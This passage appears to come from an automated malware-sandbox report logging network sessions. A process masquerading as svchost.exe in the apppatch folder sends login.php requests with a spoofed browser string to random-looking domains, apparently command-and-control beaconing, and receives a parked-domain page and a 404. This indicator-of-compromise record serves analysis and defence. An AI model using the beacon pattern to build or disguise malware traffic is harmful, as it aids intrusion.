data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
2024-11-11 17:13:11 UTC	1369	IN	Data Raw: 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 Data Ascii: <meta charset="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie
2024-11-11 17:13:11 UTC	1369	IN	Data Raw: 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c Data Ascii: low-scrolling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-l
2024-11-11 17:13:11 UTC	1369	IN	Data Raw: 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 Data Ascii: nt;width:100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:f
2024-11-11 17:13:11 UTC	1369	IN	Data Raw: 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d Data Ascii: ot(.i-amphtml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-
2024-11-11 17:13:11 UTC	1369	IN	Data Raw: 2d 61 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f Data Ascii: -ar{display:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:abso
2024-11-11 17:13:11 UTC	1369	IN	Data Raw: 2d 6e 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f Data Ascii: -notbuilt:not(.i-amphtml-layout-container)>,[layout]:not([layout=container]):not(.i-amphtml-element)>,[width][height][heights]:not([layout]):not(.i-amphtml-element)>,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>{display:none}amp-img:no
2024-11-11 17:13:11 UTC	1369	IN	Data Raw: 74 61 6e 74 3b 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 Data Ascii: tant;bottom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{backgrou
2024-11-11 17:13:11 UTC	1369	IN	Data Raw: 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 Data Ascii: overflow:hidden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	63299	99.83.170.3	443	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:13:25 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Connection: Keep-Alive
2024-11-11 17:13:25 UTC	352	IN	HTTP/1.1 200 OK Alt-Svc: h3=":443"; ma=2592000 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Content-Type: text/html; charset=utf-8 Date: Mon, 11 Nov 2024 17:13:25 GMT Etag: "g6rslpr6mk19wv" Server: Caddy Server: awselb/2.0 Vary: Accept-Encoding X-Powered-By: Next.js Connection: close Transfer-Encoding: chunked
2024-11-11 17:13:25 UTC	2372	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
2024-11-11 17:13:25 UTC	1724	IN	Data Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
2024-11-11 17:13:25 UTC	4744	IN	Data Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
2024-11-11 17:13:25 UTC	5930	IN	Data Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
2024-11-11 17:13:25 UTC	7116	IN	Data Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
2024-11-11 17:13:25 UTC	8302	IN	Data Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
2024-11-11 17:13:25 UTC	2586	IN	Data Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38 Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
2024-11-11 17:13:25 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-11-11 17:13:25 UTC	4096	IN	Data Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73 Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
2024-11-11 17:13:25 UTC	13046	IN	Data Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36 Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	63303	188.114.96.3	443	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:13:25 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-11-11 17:13:26 UTC	957	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 17:13:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QvpImHCud93VN07eo%2Fg3C8Y2bLsLwbz3ajSz%2Fq9w%2FonNmY%2FQub5UF5wBsmhxE6qFFnGlBrgjo3%2BCkDEHS8ibuMfO%2FbzvSUvG%2BGSWzfpYELI7zQ8I9GcvTygCGjj%2BrA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e0fe9b118750f3d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1204&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=2569653&cwnd=247&unsent_bytes=0&cid=7bcaf66820f6c30d&ts=845&x=0"
